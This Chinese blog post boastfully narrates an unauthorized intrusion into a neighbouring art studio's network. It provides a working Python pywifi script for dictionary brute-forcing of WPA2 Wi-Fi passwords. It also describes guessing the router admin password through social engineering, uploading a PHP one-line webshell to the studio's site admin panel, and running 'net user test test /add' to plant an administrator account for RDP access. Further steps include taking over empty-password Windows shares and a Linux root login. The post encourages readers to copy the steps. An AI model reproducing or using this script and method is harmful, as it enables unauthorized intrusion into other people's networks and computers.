【黑客彩蛋】利用Wifi拿到整个局域网的控制权

Wifi安全

提到Wifi安全，首先就想到了密码。这就不得不说，我到外面的时候，没网，就找一个人比较多的地方，破人家热点密码用[哈]。我发现，他们的密码大多数都很类似生日，或者是生日+姓名缩写：

19920918
20000123
19820518prd

这些密码特别容易破解，例如我上传的一个CSDN资源：1GB密码字典中，就包含许多这样的密码，并且是密码大全！
如果用python多进程破解的话，两分钟拿到密码不是事儿。
这次入侵，我们就来利用Wifi弱密码和一些漏洞，来获得整个网络的控制权！

No.1 破解Wifi密码并进入

不废话，各位去下我的密码字典，然后运行下面的Python3脚本破解：

import time  
import pywifi
from pywifi import const 
from asyncio.tasks import sleep
 
 
class PoJie():
    def __init__(self, path):
        self.file = open(path, "r", errors="ignore")
        wifi = pywifi.PyWiFi()  # 抓取网卡接口
        self.iface = wifi.interfaces()[0]  # 抓取第一个无限网卡
        self.iface.disconnect()  # 测试链接断开所有链接
        time.sleep(0.1)  # 休眠1秒
        assert self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]  # 测试网卡是否属于断开状态
 
    def readPassWord(self):
        print("开始破解：")
        while True:
            try:
                myStr = self.file.readline()
                if not myStr:
                    break
                bool1 = self.test_connect(myStr)
                if bool1:
                    print("密码正确：-", myStr)
                    break
                else:
                    print("密码错误:" + myStr)
                sleep(3)
            except:
                continue
 
    def test_connect(self, findStr):  # 测试链接
        profile = pywifi.Profile()  # 创建wifi链接文件
        profile.ssid = "WifiTest"  # wifi名称
        profile.auth = const.AUTH_ALG_OPEN  # 网卡的开放，
        profile.akm.append(const.AKM_TYPE_WPA2PSK)  # wifi加密算法
        profile.cipher = const.CIPHER_TYPE_CCMP  # 加密单元
        profile.key = findStr  # 密码
        self.iface.remove_all_network_profiles()  # 删除所有的wifi文件
        tmp_profile = self.iface.add_network_profile(profile)  # 设定新的链接文件
        self.iface.connect(tmp_profile)  # 链接
        time.sleep(5)
        if self.iface.status() == const.IFACE_CONNECTED:  # 判断是否连接上
            isOK = True
        else:
            isOK = False
        self.iface.disconnect()  # 断开
        time.sleep(1)
        # 检查断开状态
        assert self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
        return isOK
 
    def __del__(self):
        self.file.close()
 
# 密码字典需在网上下载
path = r"password.txt"
start = PoJie(path)
start.readPassWord()
 
 
 
 

我刚准备去喝口咖啡休息会儿，没想到咖啡刚泡好，就破解好了！密码是：

密码正确： - 12345678

我表示很无语……
敲开网络，试了试连接，果然连接成功！
（PS:如果你不想破解密码，可以去饭店来搞事情，毕竟嘛，饭店密码公开，连的人还多）

No.2 手机配合使用！

你需要一台手机配合入侵~~
下载Fing软件（百度可以下，也可以在App Store里下），连接刚刚破解的网络，进去后开始扫描IP。
一会儿：哇哦，全是本网络的IP~
这个软件会尽量解析出这个IP所代表的计算机或手机机型，它扫描Windows/Mac/Unix/Linux挺准的，但是扫描手机貌似不准。。。。
我扫描到的IP列表：
192.168.0.1 网关
192.168.0.2 WAN口
192.168.0.101 Windows 10 (PS:Me)
192.168.0.102 未知（PS:我怀疑是手机）
192.168.0.103 Windows Server 2012 R2(我看到这个结果大吃一惊，访问一下，没想到我扫描到了一个工作室的Wifi。。。访问后写着几个大字：****工作室 美术就要轻松活力！)
192.168.0.104 Windows 7
192.168.0.105 Linux Kali(我很惊奇，工作室里有人玩Kali?!?!?!)
192.168.0.106 未知

扫描过后，已经拿到IP列表了。咱们先从网关入手，拿到路由器管理员，就可以搞点儿事儿了~

No.3 网关的故事

敲开FireFox再敲上192.168.0.1，出现一个：TP-LINK 家庭网关。哇，TP-LINK用户这么多。。。（之前扫了几十家，全是TP-LINK!）
打开后，是TP-LINK的新版界面。看来这台路由器貌似才买了没一段时间。
五个大字盯着我：管理员密码
下面的输入框中八个大字也盯着我：请输入管理员密码
TP-LINK默认路由器管理密码貌似是Admin:Admin，我试了试：额，失败。
12345678？
失败。
88888888？
失败。
Python脚本又用不了，怕被网关封禁踢出网络。。。。
忽然我想到了社会工程学，问了问邻居附近是不是有一个*****工作室，邻居说有，在三楼。我赶紧爬到三楼，进去假装说有需求，然后尬聊了15分钟，最后了解到一些信息，回来尝试。
试试那些人的生日？
19830921 False
20000222 False
19980512 True
果然，工作室主的生日！
（PS:这时我忽然想起来，TP-LINK新版貌似要自己输入密码的………………以后别像我一样傻，浪费尝试次数！）
进去后，点击设备管理，和我用Fing扫到的一毛一样，并且还知道了那几台未知主机的机型！都是iPhone…
忽然想搞点事情，说实话，你进了路由器管理后只要对方坚决连Wifi，你就可以为所欲为了。设置限速、禁用等，够你玩的了！
不过我们的目标是获得他们计算机的控制权（手机就算了吧），所以这样弄也没啥意思，不如赶紧扫密码。。。。

No.4 密码兄的悲哀

我先从那台Server 2012开始玩起。想了想Windows Server不可能有空密码的，弱密码倒是可能。并且远程桌面肯定开着，于是用mstsc连上试试，果然可以连接。但是要求输入密码。咱们先搁着。
忽然我想起他们开没开Guest空密码，于是又敲开mstsc，输入Guest和空密码，没成功。。。。
（PS:这时，忽然接到一条凭空消息:老哥，你是不是又要用社会工程学了。。。）
呵呵，其实我真的有这个念头。
不过社会工程学有时候不起作用。忽然想起来，他不是有网站么？我赶紧敲开他们站点，输入/admin，果然有后台！下面还写了一个：XX科技给予技术支持。
百度一下这个XX科技，搜不到！看来是个业余团队！开始尝试注入~
可怕的是，我顺手输入了一个19980512，没想到成了！注入都剩下了。
进入后台后有一个“上传自定义页面”，呵呵，PHP一句话成功上传到根目录！
使用PHP一句话木马提交器提交一个system();，是net user test test /add，没想到成了！
赶紧敲Win标+R开mstsc，输入test:test，成功进入，没想到竟然还是管理员权限！看了一下，原来他的Apache+PHP7.2+MySQL5全是管理员权限。。。直接运行就是管理员了！
进入后，可以说这台机器被我们征服了。密码兄真的太难了。。。

No.5 密码兄的痛苦

后来，发现那几台Windows都是空密码。毕竟是民用嘛，都喜欢用空密码来玩。但他们都没有开mstsc，只开了Net Use共享，我就建立了一个NetUse连接，共享他的C:\，没想到真的成了。看来他们计算机安全系度比较低。
那台LinuxKali吧，我试了试密码，原来是20000222，年轻人果然喜欢搞事情，不知道他的QQ被封了没哈。
毕竟是Linux，Putty连接一下，果然爽，直接登录Root用户，拿到权限。

No.6 总结

本次总结只好说：密码兄，你太难了!

/* 彩蛋终于结束  */
/* 额，凉咖啡貌似不怎么好喝哈 */